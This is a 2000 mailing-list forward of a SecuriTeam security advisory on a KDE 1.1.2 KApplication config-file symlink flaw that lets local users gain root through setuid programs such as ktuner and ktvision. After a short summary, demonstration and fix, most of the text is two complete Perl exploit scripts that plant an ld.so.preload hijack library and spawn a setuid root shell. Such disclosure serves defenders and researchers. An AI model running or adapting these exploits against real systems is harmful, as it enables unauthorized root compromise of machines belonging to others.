[Penguin] [Fwd: [UNIX] KDE KApplication {} config file problem can lead to root compromise]

Thu, 01 Jun 2000 23:43:36 -0700 

o-----------ooO--(- Important  Message -)--Ooo------------o
|                                                         |
| SAVE BANDWITH, SPACE, TIME & MONEY, REPLY WITH PRUDENCE.|
|                                                         |
o----=[ Penguin @ My - Linux ([EMAIL PROTECTED]) ]=----o


Assalamualaikum,

Untuk perhatian semua.

Wassalam.

: )

-------- Original Message --------
Subject: [UNIX] KDE KApplication {} config file problem can lead to root
compromise
Date: Fri, 2 Jun 2000 01:55:35 +0800
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]

The following security advisory is sent to the securiteam mailing list,
and can be found at the SecuriTeam web site: http://www.securiteam.com


          KDE KApplication {} config file problem can lead to root
compromise
--------------------------------------------------------------------------------


SUMMARY

A bug in the KDE configuration tool enables local users to obtain root 
access. Due to insecure creation of configuration files via 
KApplication-class, local users can create arbitrary files when running 
setuid root  KDE-programs. This can result in a complete compromise of
the 
system.

DETAILS

Vulnerable systems:
KDE 1.1.2 (As shipped with SuSE 6.4)

Impact:
An attacker may gain root access to a system where vulnerable KDE 
distributions are installed. Due to the GUI-nature of KDE, it might
become 
difficult for an attacker to gain a root shell on a remote system. 
However, the individual could modify the DISPLAY environment variable to 
redirect the output to one of her own machines. A vulnerable system must 
have at least one setuser-id program installed utilizing the
KApplication 
class - ktvision and ktuner are two such examples.

Example:
$ nl /tmp/a.out.cc
     1 #include <string.h>
     2 #include <stdlib.h>
     3 #include <stdio.h>
     4 #include <kapp.h>


     5 int main(int argc, char **argv)
     6 {
     7       KApplication *base = new KApplication(argc, argv);

     8       base->exec();
     9       return 0;
    10 }
    11
$ ls -la /etc/foo
ls: /etc/foo: No such file or directory

$ ln -s /etc/foo ~/.kde/share/config/a.outrc
$ ls -la /tmp/a.out
-rwsr-sr-x   1 root     root        19450 May 28 14:14 /tmp/a.out
$ /tmp/a.out
^C

$ ls -la /etc/foo
-rw-rw-rw-   1 stealth  500             0 May 28 14:26 /etc/foo


Solution:
As a temporary solution remove the setuid bit root from the programs.

Exploit:
--- kturner exploit code ---
#!/usr/bin/perl

#
# 7350ktuner! The ktuner-hack. 
# (a.k.a. kil3r for some reason :)
#
# Just execute. Gives instant rootshell kiddie!
# If only ktuner is setuid-root and vulnerable as with
# SuSE 6.4!
#
# When has this stupid race an end?
#
# Bugdiscovery is due to Sebastian Krahmer.
# http://www.cs.uni-potsdam.de/homepages/students/linuxer
#
#
# Greets as always to TESO, security.is, lam3rz ... you all
# know who you are.
#
# 

my $rcfile = $ENV{"HOME"}."/.kde/share/config/ktunerrc";

$ENV{"PATH"}.=":/opt/kde/bin";

print ">>Get a feeling on GUI's and how secure they are.<< Stealth.\n";

print "Creating hijack-lib ...\n";
open O, ">/tmp/boom.c" or die "open(boom.c..)";
print O<<_EOF_;
#include <sys/types.h>

int time(void *v)
{
  chown("/tmp/boomsh", 0, 0);
  chmod("/tmp/boomsh", 06755);
  unlink("/etc/ld.so.preload");
  exit(1);
}
_EOF_
close O;

print "Compiling hijack-lib ...\n";
`cc -c -fPIC /tmp/boom.c -o /tmp/boom.o`;
`cc -shared /tmp/boom.o -o /tmp/boom.so`;

open O, ">/tmp/boomsh.c" or die "open(boomsh.c ...)";
print O<<_EOF2_;
#include <stdio.h>
int main() 
{
    char *a[] = {"/bin/sh", 0};
    setuid(0); setregid(0, 0);
    execve(a[0], a, 0);
    return 0;
}
_EOF2_
close O;

print "Compile shell ...\n";
`cc /tmp/boomsh.c -o /tmp/boomsh`;

umask 0;

unlink $rcfile;
symlink "/etc/ld.so.preload", $rcfile;

print "Invoking vulnerable program (ktuner)...\n";

if (fork() == 0) {
  `ktuner`;
  exit 0;
} else {
  sleep(3);
  kill 9, `pidof ktuner`;
}

open O, ">/etc/ld.so.preload" or die "Huh? Can't open preload.";
print O "/tmp/boom.so";
close O;
`/usr/bin/passwd`;

# let it look like if we have sth. to do. :)
sleep 3;
print "Welcome. But as always: BEHAVE!\n";
system("/tmp/boomsh");
--- kturner exploit code ---

--- ktvision exploit code ---
#!/usr/bin/perl

#
# 7350ktvision! The ktvision-hack. 
#
# Just execute. Gives instant rootshell kiddie!
# If only ktvision is setuid-root and vulnerable as with
# SuSE 6.4!
#
#
# Bugdiscovery is due to Sebastian Krahmer.
# http://www.cs.uni-potsdam.de/homepages/students/linuxer
#
# Greets as always to TESO, security.is, lam3rz ... you all
# know who you are.
#
# Special greets to that beautiful black-dressed woman at
# the bus stop. This one is for you. :)
# 

my $rcfile = $ENV{"HOME"}."/.kde/share/config/ktvisionrc";

$ENV{"PATH"}.=":/opt/kde/bin";

print ">>Get a feeling on GUI's and how secure they are.<< Stealth.\n";

print "Creating hijack-lib ...\n";
open O, ">/tmp/boom.c" or die "open(boom.c..)";
print O<<_EOF_;
#include <sys/types.h>

int time(void *v)
{
  chown("/tmp/boomsh", 0, 0);
  chmod("/tmp/boomsh", 06755);
  unlink("/etc/ld.so.preload");
  exit(1);
}
_EOF_
close O;

print "Compiling hijack-lib ...\n";
`cc -c -fPIC /tmp/boom.c -o /tmp/boom.o`;
`cc -shared /tmp/boom.o -o /tmp/boom.so`;

open O, ">/tmp/boomsh.c" or die "open(boomsh.c ...)";
print O<<_EOF2_;
#include <stdio.h>
int main() 
{
    char *a[] = {"/bin/sh", 0};
    setuid(0); setregid(0, 0);
    execve(a[0], a, 0);
    return 0;
}
_EOF2_
close O;

print "Compile shell ...\n";
`cc /tmp/boomsh.c -o /tmp/boomsh`;

umask 0;

unlink $rcfile;
symlink "/etc/ld.so.preload", $rcfile;

print "Invoking vulnerable program (ktvision)...\n";

if (fork() == 0) {
  `ktvision`;
  exit 0;
} else {
  sleep(3);
  kill 9, `pidof ktvision`;
}

open O, ">/etc/ld.so.preload" or die "Huh? Can't open preload.";
print O "/tmp/boom.so";
close O;
`/usr/bin/passwd`;

# let it look like if we have sth. to do. :)
sleep 3;
print "Welcome. But as always: BEHAVE!\n";
system("/tmp/boomsh");
--- ktvision exploit code ---


ADDITIONAL INFORMATION

The information has been provided by: 
<mailto:[EMAIL PROTECTED]> 
Sebastian.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and
body to: [EMAIL PROTECTED] 
In order to subscribe to the mailing list, simply forward this email to:
[EMAIL PROTECTED] 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of
any kind. 
In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages.
-
Disclaimer : http://users.my-linux.org/disclaimer.html

Reply via email to